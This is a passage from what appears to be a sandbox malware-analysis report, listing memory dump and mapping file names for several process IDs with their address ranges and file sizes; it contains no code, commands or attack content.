                                                                                                                                      • memory/4600-296-0x00000000000D0000-0x00000000000D1000-memory.dmp
                                                                                                                                        Filesize

                                                                                                                                        4KB

                                                                                                                                      • memory/4600-286-0x0000000000000000-mapping.dmp
                                                                                                                                      • memory/4608-379-0x0000000000000000-mapping.dmp
                                                                                                                                      • memory/4628-289-0x0000000000000000-mapping.dmp
                                                                                                                                      • memory/4628-332-0x0000000000500000-0x00000000005AE000-memory.dmp
                                                                                                                                        Filesize

                                                                                                                                        696KB

                                                                                                                                      • memory/4740-351-0x0000000000400000-0x0000000000414000-memory.dmp
                                                                                                                                        Filesize

                                                                                                                                        80KB

                                                                                                                                      • memory/4740-341-0x0000000000000000-mapping.dmp
                                                                                                                                      • memory/4856-356-0x0000000000470000-0x000000000051E000-memory.dmp
                                                                                                                                        Filesize

                                                                                                                                        696KB

                                                                                                                                      • memory/4856-357-0x0000000000400000-0x0000000000463000-memory.dmp
                                                                                                                                        Filesize

                                                                                                                                        396KB

                                                                                                                                      • memory/4856-310-0x0000000000000000-mapping.dmp
                                                                                                                                      • memory/4868-366-0x00000000001F0000-0x00000000001F1000-memory.dmp
                                                                                                                                        Filesize

                                                                                                                                        4KB

                                                                                                                                      • memory/4868-349-0x0000000000000000-mapping.dmp
                                                                                                                                      • memory/4912-337-0x0000000005C10000-0x0000000005C11000-memory.dmp
                                                                                                                                        Filesize

                                                                                                                                        4KB

                                                                                                                                      • memory/4912-312-0x0000000000000000-mapping.dmp
                                                                                                                                      • memory/4912-322-0x0000000077AB0000-0x0000000077C3E000-memory.dmp
                                                                                                                                        Filesize

                                                                                                                                        1.6MB

                                                                                                                                      • memory/4992-316-0x0000000000000000-mapping.dmp
                                                                                                                                      • memory/4992-318-0x00000000004A0000-0x00000000004A1000-memory.dmp
                                                                                                                                        Filesize

                                                                                                                                        4KB

                                                                                                                                      • memory/4992-321-0x0000000000C60000-0x0000000000C62000-memory.dmp
                                                                                                                                        Filesize

                                                                                                                                        8KB

                                                                                                                                      • memory/5140-432-0x0000000000CA0000-0x0000000000CFD000-memory.dmp
                                                                                                                                        Filesize

                                                                                                                                        372KB

                                                                                                                                      • memory/5140-429-0x0000000000B9D000-0x0000000000C9E000-memory.dmp
                                                                                                                                        Filesize

                                                                                                                                        1.0MB

                                                                                                                                      • memory/5140-407-0x0000000000000000-mapping.dmp
                                                                                                                                      • memory/5344-424-0x0000000000000000-mapping.dmp
                                                                                                                                      • memory/5344-494-0x0000000005750000-0x0000000005751000-memory.dmp
                                                                                                                                        Filesize

                                                                                                                                        4KB

                                                                                                                                      • memory/5420-433-0x00007FF674E84060-mapping.dmp
                                                                                                                                      • memory/5420-451-0x000001782D800000-0x000001782D872000-memory.dmp
                                                                                                                                        Filesize

                                                                                                                                        456KB

                                                                                                                                      • memory/5644-486-0x0000000000400000-0x0000000000414000-memory.dmp
                                                                                                                                        Filesize

                                                                                                                                        80KB

                                                                                                                                      • memory/5644-454-0x0000000000000000-mapping.dmp
                                                                                                                                      • memory/5816-472-0x0000000000000000-mapping.dmp
                                                                                                                                      • memory/5816-508-0x00000000001E0000-0x00000000001E1000-memory.dmp
                                                                                                                                        Filesize

                                                                                                                                        4KB